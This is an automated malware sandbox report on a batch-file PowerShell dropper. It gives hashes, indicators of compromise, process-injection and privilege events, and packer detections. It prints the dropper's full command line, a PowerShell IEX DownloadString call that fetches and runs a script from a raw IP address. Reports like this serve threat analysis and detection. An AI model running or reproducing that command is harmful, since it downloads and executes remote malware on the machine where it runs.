99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7

Resubmissions

04-08-2020 12:19

03-08-2020 09:10

Target

2b4587aed40db6e44cbff092b52b841e.bat
Size

218B
MD5

c69dabb8c2f1ca155fb5fe3b0482d0a7
SHA1

b3faaf0bd82fe27b076ec814b2123cf962ead51b
SHA256

99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
SHA512

c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3908 wrote to memory of 3860	3908	cmd.exe	powershell.exe
PID 3908 wrote to memory of 3860	3908	cmd.exe	powershell.exe
PID 3908 wrote to memory of 3860	3908	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3592 3860 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 3592 WerFault.exe
Token: SeBackupPrivilege 3592 WerFault.exe
Token: SeDebugPrivilege 3592 WerFault.exe

pid	pid_target	process	target process
3592	3860	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

WerFault.exe

ServiceHost packer 6 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/3860-3-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3860-2-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3860-4-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3860-5-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3860-6-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/3860-7-0x0000000000000000-mapping.dmp	servicehost

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"
2⤵
PID:3860

memory/3592-1-0x0000000004830000-0x0000000004831000-memory.dmp

Filesize
4KB

Download
memory/3592-8-0x0000000004E60000-0x0000000004E61000-memory.dmp

Filesize
4KB

Download
memory/3860-0-0x0000000000000000-mapping.dmp

Download
memory/3860-3-0x0000000000000000-mapping.dmp

Download
memory/3860-2-0x0000000000000000-mapping.dmp

Download
memory/3860-4-0x0000000000000000-mapping.dmp

Download
memory/3860-5-0x0000000000000000-mapping.dmp

Download
memory/3860-6-0x0000000000000000-mapping.dmp

Download
memory/3860-7-0x0000000000000000-mapping.dmp

Download